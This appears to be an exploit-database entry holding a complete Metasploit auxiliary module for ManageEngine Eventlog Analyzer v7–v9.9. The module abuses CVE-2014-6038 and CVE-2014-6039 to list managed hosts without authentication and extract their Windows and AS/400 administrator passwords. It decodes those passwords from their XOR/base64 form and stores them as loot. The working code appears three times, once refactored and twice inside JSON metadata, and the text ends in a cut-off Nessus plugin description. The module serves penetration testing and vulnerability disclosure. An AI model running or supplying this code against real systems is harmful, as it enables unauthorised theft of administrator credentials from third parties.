ID 1337DAY-ID-22839 Type zdt Reporter Pedro Ribeiro Modified 2014-11-10T00:00:00
Description
ManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that allow an unauthenticated user to obtain the superuser password of any managed Windows and AS/400 hosts. This module abuses both vulnerabilities to collect all the available usernames and passwords. First the agentHandler servlet is abused to get the hostid and slid of each device (CVE-2014-6038); then these numeric ids are used to extract usernames and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7 the TARGETURI has to be prepended with /event.

#### Usage Info
msf > use auxiliary/gather/eventlog_cred_disclosure
msf auxiliary(eventlog_cred_disclosure) > show actions
...actions...
msf auxiliary(eventlog_cred_disclosure) > set ACTION <action-name>
msf auxiliary(eventlog_cred_disclosure) > show options
...show and set options...
msf auxiliary(eventlog_cred_disclosure) > run
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rexml/document'
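class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  # Each byte of a managed-host password is XORed with this value before the
  # result is base64 encoded. This is obfuscation, not encryption: the key is
  # fixed and public, so the stored value is equivalent to plaintext.
  PASSWORD_XOR_KEY = 0x30

  # Managed-host types that are filed as Metasploit login records, mapped to
  # the service name and TCP port the record is attached to. Hosts of any other
  # type are still printed and written to loot, just not reported as logins.
  LOGIN_SERVICES = {
    'Windows'    => ['epmap', 135],
    'IBM AS/400' => ['as-servermap', 449]
  }.freeze

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure',
      'Description' => %q{
        ManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that
        allow an unauthenticated user to obtain the superuser password of any managed Windows and
        AS/400 hosts. This module abuses both vulnerabilities to collect all the available
        usernames and passwords. First the agentHandler servlet is abused to get the hostid and
        slid of each device (CVE-2014-6038); then these numeric id's are used to extract usernames
        and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7
        the TARGETURI has to be prepended with /event.
      },
      'Author'      =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2014-6038' ],
          [ 'CVE', '2014-6039' ],
          [ 'OSVDB', '114342' ],
          [ 'OSVDB', '114344' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_eventlog_info_disc.txt' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/12' ]
        ],
      'DisclosureDate' => 'Nov 5 2014'))
    register_options(
      [
        Opt::RPORT(8400),
        OptString.new('TARGETURI', [ true, 'Eventlog Analyzer application URI (should be /event for version 7)', '/']),
      ], self.class)
  end

  # Decode a password attribute from a hostdetails response.
  #
  # @param encoded_password [String] base64 text; every decoded byte is XORed
  #   with PASSWORD_XOR_KEY
  # @return [String] the plaintext password ('' for an empty input)
  def decode_password(encoded_password)
    plain = ''
    Rex::Text.decode_base64(encoded_password).each_byte do |byte|
      # String#<< with an Integer appends that codepoint.
      plain << (byte ^ PASSWORD_XOR_KEY)
    end
    plain
  end

  # Enumerate the managed hosts through agentHandler, fetch each host's details
  # through hostdetails, print and record every login, then save the table as
  # CSV loot.
  #
  # Both the console output and the loot file contain plaintext administrator
  # credentials of third-party hosts; treat them with the same care as any
  # other harvested secret.
  #
  # Aborts through fail_with when a servlet is unreachable or returns a body
  # that REXML cannot parse.
  def run
    cred_table = Rex::Ui::Text::Table.new(
      'Header'  => 'ManageEngine EventLog Analyzer Managed Devices Credentials',
      'Indent'  => 1,
      'Columns' => %w[Host Type SubType Domain Username Password]
    )

    managed_host_ids.each do |slid, host_id|
      host_details_document(slid, host_id).elements.each('Details/Hosts') do |host|
        # Missing attributes become '' once, here, so nothing below has to
        # nil-check.
        host_ipaddress = host.attributes['host_ipaddress'] || ''
        host.elements.each('HostDetails') do |details|
          login = extract_login(host_ipaddress, details)
          print_good(format_login(login))
          cred_table << login.values_at(:host, :type, :subtype, :domain, :username, :password)
          report_login(login)
        end
      end
    end

    print_line
    print_line("#{cred_table}")
    path = store_loot(
      'manageengine.eventlog.managed_hosts.creds',
      'text/csv',
      rhost,
      cred_table.to_csv,
      'manageengine_eventlog_managed_hosts_creds.csv',
      'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credentials')
    print_status "Credentials saved in: #{path}"
  end

  # Create the credential core for one username/password pair, recording the
  # EventLog Analyzer web service it was read from as the credential's origin.
  #
  # @param cred_opts [Hash] :username and :password
  # @return whatever create_credential returns
  def report_credential_core(cred_opts={})
    # Origin service: the EventLog Analyzer instance this module talked to.
    origin_service_data = {
      address: rhost,
      port: rport,
      service_name: (ssl ? 'https' : 'http'),
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }
    credential_data = {
      origin_type: :service,
      module_fullname: self.fullname,
      private_type: :password,
      private_data: cred_opts[:password],
      username: cred_opts[:username]
    }
    create_credential(credential_data.merge(origin_service_data))
  end

  private

  # Step one (CVE-2014-6038): request the HostDetails table from agentHandler
  # and return the [slid, host_id] pair of every row that carries a password
  # attribute; rows without one are not managed with credentials.
  #
  # @return [Array<Array(String, String)>]
  def managed_host_ids
    res = send_request_cgi({
      'uri'      => normalize_uri(target_uri.path, 'agentHandler'),
      'method'   => 'GET',
      'vars_get' => {
        'mode'  => 'getTableData',
        'table' => 'HostDetails'
      }
    })
    # fail_with aborts the module, so no explicit return is needed after it.
    unless res && res.code == 200
      fail_with(Failure::NotFound, "#{peer} - Failed to reach agentHandler servlet")
    end

    # The author observed that this response fails to parse when a password
    # contains digits (they appear as &#...; references). The value is only
    # used here as a presence flag -- the real password is fetched per host --
    # so every reference is replaced with random letters, which keeps the
    # attribute non-empty and the document parseable. Note this is a random
    # string, not an empty one.
    xml = res.body.to_s.gsub(/&#[0-9]*;/, Rex::Text.rand_text_alpha(6))

    rows = []
    parse_xml(xml).elements.each('Details/HostDetails') do |ele|
      next unless ele.attributes['password']
      rows << [ele.attributes['slid'], ele.attributes['host_id']]
    end
    rows
  end

  # Step two (CVE-2014-6039): fetch and parse the hostdetails document for one
  # managed host.
  #
  # @param slid [String] id taken from managed_host_ids
  # @param host_id [String] id taken from managed_host_ids
  # @return [REXML::Document]
  def host_details_document(slid, host_id)
    res = send_request_cgi({
      'uri'      => normalize_uri(target_uri.path, 'hostdetails'),
      'method'   => 'GET',
      'vars_get' => {
        'slid'   => slid,
        'hostid' => host_id
      }
    })
    unless res && res.code == 200
      fail_with(Failure::NotFound, "#{peer} - Failed to reach hostdetails servlet")
    end
    parse_xml(res.body)
  end

  # Parse server-supplied XML, aborting the module (and echoing the raw text)
  # when it is malformed. The input is remote-controlled; REXML's parse and
  # entity-expansion errors are StandardError subclasses, so all of them land
  # in the rescue below.
  #
  # @param xml [String]
  # @return [REXML::Document]
  def parse_xml(xml)
    REXML::Document.new(xml)
  rescue StandardError
    fail_with(Failure::Unknown, "#{peer} - Error parsing the XML, dumping output #{xml}")
  end

  # Build one login hash from a HostDetails element.
  #
  # @param host_ipaddress [String] address of the managed host
  # @param details [REXML::Element] a HostDetails element
  # @return [Hash] keys :host, :type, :subtype, :domain, :username, :password
  def extract_login(host_ipaddress, details)
    attr = ->(name) { details.attributes[name] || '' }
    type = attr.call('type')
    subtype = attr.call('subtype')
    # AS/400 rows carry garbage in domain_name even though there is no domain,
    # so only Windows-flavoured rows keep it.
    domain = windows_login?(type, subtype) ? attr.call('domain_name') : ''
    {
      host: host_ipaddress,
      type: type,
      subtype: subtype,
      domain: domain,
      username: attr.call('username'),
      password: decode_password(attr.call('password'))
    }
  end

  # @return [Boolean] true when either the type or the subtype mentions Windows
  def windows_login?(type, subtype)
    type.include?('Windows') || subtype.include?('Windows')
  end

  # One-line console summary of a login, carrying the same fields as the CSV row.
  #
  # @param login [Hash] as built by extract_login
  # @return [String]
  def format_login(login)
    msg = "Got login to #{login[:host]} | running #{login[:type]}"
    msg << " | #{login[:subtype]}" unless login[:subtype].empty?
    msg << ' | username: '
    msg << (login[:domain].empty? ? login[:username] : "#{login[:domain]}\\#{login[:username]}")
    msg << " | password: #{login[:password]}"
  end

  # File the login under its LOGIN_SERVICES entry. Other host types are
  # skipped; they have already been printed and tabulated.
  #
  # @param login [Hash] as built by extract_login
  def report_login(login)
    service_name, port = LOGIN_SERVICES[login[:type]]
    return unless service_name

    credential_core = report_credential_core(
      password: login[:password],
      username: login[:username]
    )
    create_credential_login(
      address: login[:host],
      service_name: service_name,
      workspace_id: myworkspace_id,
      protocol: 'tcp',
      port: port,
      core: credential_core,
      # The credentials were read from a database, not tried against the host.
      status: Metasploit::Model::Login::Status::UNTRIED
    )
  end
end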
# 0day.today [2018-04-14] #
{"published": "2014-11-10T00:00:00", "id": "1337DAY-ID-22839", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:15:47", "bulletin": {"published": "2014-11-10T00:00:00", "id": "1337DAY-ID-22839", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 2.8, "modified": "2016-04-20T01:15:47", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/"}}, "hash": "6eaaee0b99e8b960942710aa198fd03f2de1d98a3de27e1e7843537f4dc90981", "description": "ManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that allow an unauthenticated user to obtain the superuser password of any managed Windows and AS/400 hosts. This module abuses both vulnerabilities to collect all the available usernames and passwords. First the agentHandler servlet is abused to get the hostid and slid of each device (CVE-2014-6038); then these numeric id's are used to extract usernames and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7 the TARGETURI has to be prepended with /event.#### Usage Info\nmsf > use auxiliary/gather/eventlog_cred_disclosure msf auxiliary(eventlog_cred_disclosure) > show actions ...actions... msf auxiliary(eventlog_cred_disclosure) > set ACTION <action-name> msf auxiliary(eventlog_cred_disclosure) > show options ...show and set options... 
msf auxiliary(eventlog_cred_disclosure) > run", "type": "zdt", "lastseen": "2016-04-20T01:15:47", "edition": 1, "title": "ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure", "href": "http://0day.today/exploit/description/22839", "modified": "2014-11-10T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": ["CVE-2014-6038", "CVE-2014-6039"], "sourceHref": "http://0day.today/exploit/22839", "references": [], "reporter": "Pedro Ribeiro", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\nrequire 'msf/core'\r\nrequire 'rexml/document'\r\nclass Metasploit3 < Msf::Auxiliary\r\ninclude Msf::Exploit::Remote::HttpClient\r\ninclude Msf::Auxiliary::Report\r\ndef initialize(info = {})\r\nsuper(update_info(info,\r\n'Name' => 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure',\r\n'Description' => %q{\r\nManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that\r\nallow an unauthenticated user to obtain the superuser password of any managed Windows and\r\nAS/400 hosts. This module abuses both vulnerabilities to collect all the available\r\nusernames and passwords. First the agentHandler servlet is abused to get the hostid and\r\nslid of each device (CVE-2014-6038); then these numeric id's are used to extract usernames\r\nand passwords by abusing the hostdetails servlet (CVE-2014-6039). 
Note that on version 7\r\nthe TARGETURI has to be prepended with /event.\r\n},\r\n'Author' =>\r\n[\r\n'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module\r\n],\r\n'License' => MSF_LICENSE,\r\n'References' =>\r\n[\r\n[ 'CVE', '2014-6038' ],\r\n[ 'CVE', '2014-6039' ],\r\n[ 'OSVDB', '114342' ],\r\n[ 'OSVDB', '114344' ],\r\n[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_eventlog_info_disc.txt' ],\r\n[ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/12' ]\r\n],\r\n'DisclosureDate' => 'Nov 5 2014'))\r\nregister_options(\r\n[\r\nOpt::RPORT(8400),\r\nOptString.new('TARGETURI', [ true, 'Eventlog Analyzer application URI (should be /event for version 7)', '/']),\r\n], self.class)\r\nend\r\ndef decode_password(encoded_password)\r\npassword_xor = Rex::Text.decode_base64(encoded_password)\r\npassword = ''\r\npassword_xor.bytes.each do |byte|\r\npassword << (byte ^ 0x30)\r\nend\r\nreturn password\r\nend\r\ndef run\r\nres = send_request_cgi({\r\n'uri' => normalize_uri(target_uri.path, 'agentHandler'),\r\n'method' =>'GET',\r\n'vars_get' => {\r\n'mode' => 'getTableData',\r\n'table' => 'HostDetails'\r\n}\r\n})\r\nunless res && res.code == 200\r\nfail_with(Failure::NotFound, \"#{peer} - Failed to reach agentHandler servlet\")\r\nreturn\r\nend\r\n# When passwords have digits the XML parsing will fail.\r\n# Replace with an empty password attribute so that we know the device has a password\r\n# and therefore we want to add it to our host list.\r\nxml = res.body.to_s.gsub(/&#[0-9]*;/,Rex::Text.rand_text_alpha(6))\r\nbegin\r\ndoc = REXML::Document.new(xml)\r\nrescue\r\nfail_with(Failure::Unknown, \"#{peer} - Error parsing the XML, dumping output #{xml}\")\r\nend\r\nslid_host_ary = []\r\ndoc.elements.each('Details/HostDetails') do |ele|\r\nif ele.attributes['password']\r\n# If an element doesn't have a password, then we don't care about it.\r\n# Otherwise store the slid and host_id to use later.\r\nslid_host_ary << 
[ele.attributes['slid'], ele.attributes['host_id']]\r\nend\r\nend\r\ncred_table = Rex::Ui::Text::Table.new(\r\n'Header' => 'ManageEngine EventLog Analyzer Managed Devices Credentials',\r\n'Indent' => 1,\r\n'Columns' =>\r\n[\r\n'Host',\r\n'Type',\r\n'SubType',\r\n'Domain',\r\n'Username',\r\n'Password',\r\n]\r\n)\r\nslid_host_ary.each do |host|\r\nres = send_request_cgi({\r\n'uri' => normalize_uri(target_uri.path, 'hostdetails'),\r\n'method' =>'GET',\r\n'vars_get' => {\r\n'slid' => host[0],\r\n'hostid' => host[1]\r\n}\r\n})\r\nunless res && res.code == 200\r\nfail_with(Failure::NotFound, \"#{peer} - Failed to reach hostdetails servlet\")\r\nend\r\nbegin\r\ndoc = REXML::Document.new(res.body)\r\nrescue\r\nfail_with(Failure::Unknown, \"#{peer} - Error parsing the XML, dumping output #{res.body.to_s}\")\r\nend\r\ndoc.elements.each('Details/Hosts') do |ele|\r\n# Add an empty string if a variable doesn't exist, we have to check it\r\n# somewhere and it's easier to do it here.\r\nhost_ipaddress = ele.attributes['host_ipaddress'] || ''\r\nele.elements.each('HostDetails') do |details|\r\ndomain_name = details.attributes['domain_name'] || ''\r\nusername = details.attributes['username'] || ''\r\npassword_encoded = details.attributes['password'] || ''\r\npassword = decode_password(password_encoded)\r\ntype = details.attributes['type'] || ''\r\nsubtype = details.attributes['subtype'] || ''\r\nunless type =~ /Windows/ || subtype =~ /Windows/\r\n# With AS/400 we get some garbage in the domain name even though it doesn't exist\r\ndomain_name = \"\"\r\nend\r\nmsg = \"Got login to #{host_ipaddress} | running \"\r\nmsg << type << (subtype != '' ? \" | #{subtype}\" : '')\r\nmsg << ' | username: '\r\nmsg << (domain_name != '' ? 
\"#{domain_name}\\\\#{username}\" : username)\r\nmsg << \" | password: #{password}\"\r\nprint_good(msg)\r\ncred_table << [host_ipaddress, type, subtype, domain_name, username, password]\r\nif type == 'Windows'\r\nservice_name = 'epmap'\r\nport = 135\r\nelsif type == 'IBM AS/400'\r\nservice_name = 'as-servermap'\r\nport = 449\r\nelse\r\nnext\r\nend\r\ncredential_core = report_credential_core({\r\npassword: password,\r\nusername: username,\r\n})\r\nhost_login_data = {\r\naddress: host_ipaddress,\r\nservice_name: service_name,\r\nworkspace_id: myworkspace_id,\r\nprotocol: 'tcp',\r\nport: port,\r\ncore: credential_core,\r\nstatus: Metasploit::Model::Login::Status::UNTRIED\r\n}\r\ncreate_credential_login(host_login_data)\r\nend\r\nend\r\nend\r\nprint_line\r\nprint_line(\"#{cred_table}\")\r\nloot_name = 'manageengine.eventlog.managed_hosts.creds'\r\nloot_type = 'text/csv'\r\nloot_filename = 'manageengine_eventlog_managed_hosts_creds.csv'\r\nloot_desc = 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credentials'\r\np = store_loot(\r\nloot_name,\r\nloot_type,\r\nrhost,\r\ncred_table.to_csv,\r\nloot_filename,\r\nloot_desc)\r\nprint_status \"Credentials saved in: #{p}\"\r\nend\r\ndef report_credential_core(cred_opts={})\r\n# Set up the has for our Origin service\r\norigin_service_data = {\r\naddress: rhost,\r\nport: rport,\r\nservice_name: (ssl ? 
'https' : 'http'),\r\nprotocol: 'tcp',\r\nworkspace_id: myworkspace_id\r\n}\r\ncredential_data = {\r\norigin_type: :service,\r\nmodule_fullname: self.fullname,\r\nprivate_type: :password,\r\nprivate_data: cred_opts[:password],\r\nusername: cred_opts[:username]\r\n}\r\ncredential_data.merge!(origin_service_data)\r\ncreate_credential(credential_data)\r\nend\r\nend\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "f01b1ab3e618faa029e9bd5ed5ae6625", "key": "title"}, {"hash": "44513a88b13ab026467633180dde1273", "key": "published"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "57b935b395d7ec2e297bfe7879f1cf9c", "key": "href"}, {"hash": "e04ff4477a3019f6a37321dc1a05f8f4", "key": "reporter"}, {"hash": "44513a88b13ab026467633180dde1273", "key": "modified"}, {"hash": "e873b4af926fd58223684d39f4401b79", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "ace0eeb6de2686a46d53610085149162", "key": "sourceHref"}, {"hash": "b3d33fe4939262fa2ff3c8607bc68aee", "key": "sourceData"}, {"hash": "f4b31ab4bdb4839c4a9135507604a89c", "key": "cvelist"}], "objectVersion": "1.0"}}], "description": "ManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that allow an unauthenticated user to obtain the superuser password of any managed Windows and AS/400 hosts. This module abuses both vulnerabilities to collect all the available usernames and passwords. First the agentHandler servlet is abused to get the hostid and slid of each device (CVE-2014-6038); then these numeric id's are used to extract usernames and passwords by abusing the hostdetails servlet (CVE-2014-6039). 
Note that on version 7 the TARGETURI has to be prepended with /event.#### Usage Info\nmsf > use auxiliary/gather/eventlog_cred_disclosure msf auxiliary(eventlog_cred_disclosure) > show actions ...actions... msf auxiliary(eventlog_cred_disclosure) > set ACTION <action-name> msf auxiliary(eventlog_cred_disclosure) > show options ...show and set options... msf auxiliary(eventlog_cred_disclosure) > run", "hash": "44980da975763a86d21a11450aa9e79c6f4d63457f140950a7afddf89a058e87", "enchantments": {"score": {"value": 1.0, "vector": "NONE", "modified": "2018-04-14T11:46:15"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31449", "SECURITYVULNS:VULN:14113"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105111"]}, {"type": "exploitdb", "idList": ["EDB-ID:43893"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:128996"]}, {"type": "zdt", "idList": ["1337DAY-ID-22829", "1337DAY-ID-29644"]}, {"type": "nessus", "idList": ["MANAGEENGINE_EVENTLOG_ANALYZER_CVE-2014-6038.NASL"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/EVENTLOG_CRED_DISCLOSURE"]}], "modified": "2018-04-14T11:46:15"}, "vulnersScore": 1.0}, "type": "zdt", "lastseen": "2018-04-14T11:46:15", "edition": 2, "title": "ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure", "href": "https://0day.today/exploit/description/22839", "modified": "2014-11-10T00:00:00", "bulletinFamily": "exploit", "viewCount": 6, "cvelist": ["CVE-2014-6038", "CVE-2014-6039"], "sourceHref": "https://0day.today/exploit/22839", "references": [], "reporter": "Pedro Ribeiro", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\nrequire 'msf/core'\r\nrequire 'rexml/document'\r\nclass Metasploit3 < Msf::Auxiliary\r\ninclude Msf::Exploit::Remote::HttpClient\r\ninclude Msf::Auxiliary::Report\r\ndef initialize(info = 
{})\r\nsuper(update_info(info,\r\n'Name' => 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure',\r\n'Description' => %q{\r\nManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that\r\nallow an unauthenticated user to obtain the superuser password of any managed Windows and\r\nAS/400 hosts. This module abuses both vulnerabilities to collect all the available\r\nusernames and passwords. First the agentHandler servlet is abused to get the hostid and\r\nslid of each device (CVE-2014-6038); then these numeric id's are used to extract usernames\r\nand passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7\r\nthe TARGETURI has to be prepended with /event.\r\n},\r\n'Author' =>\r\n[\r\n'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module\r\n],\r\n'License' => MSF_LICENSE,\r\n'References' =>\r\n[\r\n[ 'CVE', '2014-6038' ],\r\n[ 'CVE', '2014-6039' ],\r\n[ 'OSVDB', '114342' ],\r\n[ 'OSVDB', '114344' ],\r\n[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_eventlog_info_disc.txt' ],\r\n[ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/12' ]\r\n],\r\n'DisclosureDate' => 'Nov 5 2014'))\r\nregister_options(\r\n[\r\nOpt::RPORT(8400),\r\nOptString.new('TARGETURI', [ true, 'Eventlog Analyzer application URI (should be /event for version 7)', '/']),\r\n], self.class)\r\nend\r\ndef decode_password(encoded_password)\r\npassword_xor = Rex::Text.decode_base64(encoded_password)\r\npassword = ''\r\npassword_xor.bytes.each do |byte|\r\npassword << (byte ^ 0x30)\r\nend\r\nreturn password\r\nend\r\ndef run\r\nres = send_request_cgi({\r\n'uri' => normalize_uri(target_uri.path, 'agentHandler'),\r\n'method' =>'GET',\r\n'vars_get' => {\r\n'mode' => 'getTableData',\r\n'table' => 'HostDetails'\r\n}\r\n})\r\nunless res && res.code == 200\r\nfail_with(Failure::NotFound, \"#{peer} - Failed to reach agentHandler servlet\")\r\nreturn\r\nend\r\n# When 
passwords have digits the XML parsing will fail.\r\n# Replace with an empty password attribute so that we know the device has a password\r\n# and therefore we want to add it to our host list.\r\nxml = res.body.to_s.gsub(/&#[0-9]*;/,Rex::Text.rand_text_alpha(6))\r\nbegin\r\ndoc = REXML::Document.new(xml)\r\nrescue\r\nfail_with(Failure::Unknown, \"#{peer} - Error parsing the XML, dumping output #{xml}\")\r\nend\r\nslid_host_ary = []\r\ndoc.elements.each('Details/HostDetails') do |ele|\r\nif ele.attributes['password']\r\n# If an element doesn't have a password, then we don't care about it.\r\n# Otherwise store the slid and host_id to use later.\r\nslid_host_ary << [ele.attributes['slid'], ele.attributes['host_id']]\r\nend\r\nend\r\ncred_table = Rex::Ui::Text::Table.new(\r\n'Header' => 'ManageEngine EventLog Analyzer Managed Devices Credentials',\r\n'Indent' => 1,\r\n'Columns' =>\r\n[\r\n'Host',\r\n'Type',\r\n'SubType',\r\n'Domain',\r\n'Username',\r\n'Password',\r\n]\r\n)\r\nslid_host_ary.each do |host|\r\nres = send_request_cgi({\r\n'uri' => normalize_uri(target_uri.path, 'hostdetails'),\r\n'method' =>'GET',\r\n'vars_get' => {\r\n'slid' => host[0],\r\n'hostid' => host[1]\r\n}\r\n})\r\nunless res && res.code == 200\r\nfail_with(Failure::NotFound, \"#{peer} - Failed to reach hostdetails servlet\")\r\nend\r\nbegin\r\ndoc = REXML::Document.new(res.body)\r\nrescue\r\nfail_with(Failure::Unknown, \"#{peer} - Error parsing the XML, dumping output #{res.body.to_s}\")\r\nend\r\ndoc.elements.each('Details/Hosts') do |ele|\r\n# Add an empty string if a variable doesn't exist, we have to check it\r\n# somewhere and it's easier to do it here.\r\nhost_ipaddress = ele.attributes['host_ipaddress'] || ''\r\nele.elements.each('HostDetails') do |details|\r\ndomain_name = details.attributes['domain_name'] || ''\r\nusername = details.attributes['username'] || ''\r\npassword_encoded = details.attributes['password'] || ''\r\npassword = decode_password(password_encoded)\r\ntype = 
details.attributes['type'] || ''\r\nsubtype = details.attributes['subtype'] || ''\r\nunless type =~ /Windows/ || subtype =~ /Windows/\r\n# With AS/400 we get some garbage in the domain name even though it doesn't exist\r\ndomain_name = \"\"\r\nend\r\nmsg = \"Got login to #{host_ipaddress} | running \"\r\nmsg << type << (subtype != '' ? \" | #{subtype}\" : '')\r\nmsg << ' | username: '\r\nmsg << (domain_name != '' ? \"#{domain_name}\\\\#{username}\" : username)\r\nmsg << \" | password: #{password}\"\r\nprint_good(msg)\r\ncred_table << [host_ipaddress, type, subtype, domain_name, username, password]\r\nif type == 'Windows'\r\nservice_name = 'epmap'\r\nport = 135\r\nelsif type == 'IBM AS/400'\r\nservice_name = 'as-servermap'\r\nport = 449\r\nelse\r\nnext\r\nend\r\ncredential_core = report_credential_core({\r\npassword: password,\r\nusername: username,\r\n})\r\nhost_login_data = {\r\naddress: host_ipaddress,\r\nservice_name: service_name,\r\nworkspace_id: myworkspace_id,\r\nprotocol: 'tcp',\r\nport: port,\r\ncore: credential_core,\r\nstatus: Metasploit::Model::Login::Status::UNTRIED\r\n}\r\ncreate_credential_login(host_login_data)\r\nend\r\nend\r\nend\r\nprint_line\r\nprint_line(\"#{cred_table}\")\r\nloot_name = 'manageengine.eventlog.managed_hosts.creds'\r\nloot_type = 'text/csv'\r\nloot_filename = 'manageengine_eventlog_managed_hosts_creds.csv'\r\nloot_desc = 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credentials'\r\np = store_loot(\r\nloot_name,\r\nloot_type,\r\nrhost,\r\ncred_table.to_csv,\r\nloot_filename,\r\nloot_desc)\r\nprint_status \"Credentials saved in: #{p}\"\r\nend\r\ndef report_credential_core(cred_opts={})\r\n# Set up the has for our Origin service\r\norigin_service_data = {\r\naddress: rhost,\r\nport: rport,\r\nservice_name: (ssl ? 
'https' : 'http'),\r\nprotocol: 'tcp',\r\nworkspace_id: myworkspace_id\r\n}\r\ncredential_data = {\r\norigin_type: :service,\r\nmodule_fullname: self.fullname,\r\nprivate_type: :password,\r\nprivate_data: cred_opts[:password],\r\nusername: cred_opts[:username]\r\n}\r\ncredential_data.merge!(origin_service_data)\r\ncreate_credential(credential_data)\r\nend\r\nend\n\n# 0day.today [2018-04-14] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "f4b31ab4bdb4839c4a9135507604a89c", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "e873b4af926fd58223684d39f4401b79", "key": "description"}, {"hash": "92244d3b782998b53676280da63cfaea", "key": "href"}, {"hash": "44513a88b13ab026467633180dde1273", "key": "modified"}, {"hash": "44513a88b13ab026467633180dde1273", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e04ff4477a3019f6a37321dc1a05f8f4", "key": "reporter"}, {"hash": "7cc3c110c1ab29967629be4390fbf452", "key": "sourceData"}, {"hash": "31d97ba998074182267891c437df5e58", "key": "sourceHref"}, {"hash": "f01b1ab3e618faa029e9bd5ed5ae6625", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"nessus": [{"lastseen": "2019-11-01T02:54:54", "bulletinFamily": "scanner", "description": "The EventLog Analyzer version installed on the remote web server is\naffected by multiple information disclosure vulnerabilities :\n\n - A flaw exists in the ", "modified": "2019-11-02T00:00:00", "id": "MANAGEENGINE_EVENTLOG_ANALYZER_CVE-2014-6038.NASL", "href": "https://www.tenable.com/plugins/nessus/81402", "published": "2015-02-18T00:00:00", "title": "ManageEngine EventLog Analyzer 'agentHandler' Information Disclosure", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81402);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/28 22:47:41\");\n\n script_cve_id(\"CVE-2014-6038\",\"CVE-2014-6039\");\n script_bugtraq_id(70959,70960);\n\n script_name(english:\"ManageEngine EventLog Analyzer 'agentHandler' Information Disclosure\");\n script_summary(english:\"Tries to exploit the issue.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts an application that is affected by\nmultiple information disclosure vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The EventLog Analyzer version installed on the remote web server is\naffected by multiple information disclosure vulnerabilities :\n\n - A flaw exists in the 'agentHandler' servlet that allows\n a remote attacker to retrieve user names and password\n hashes and other sensitive information. (CVE-2014-6038)\n\n - A flaw exists in the 'hostdetails' servlet that allows a\n remote attacker to retrieve user names and passwords for\n systems managed by EventLog Analyzer. 
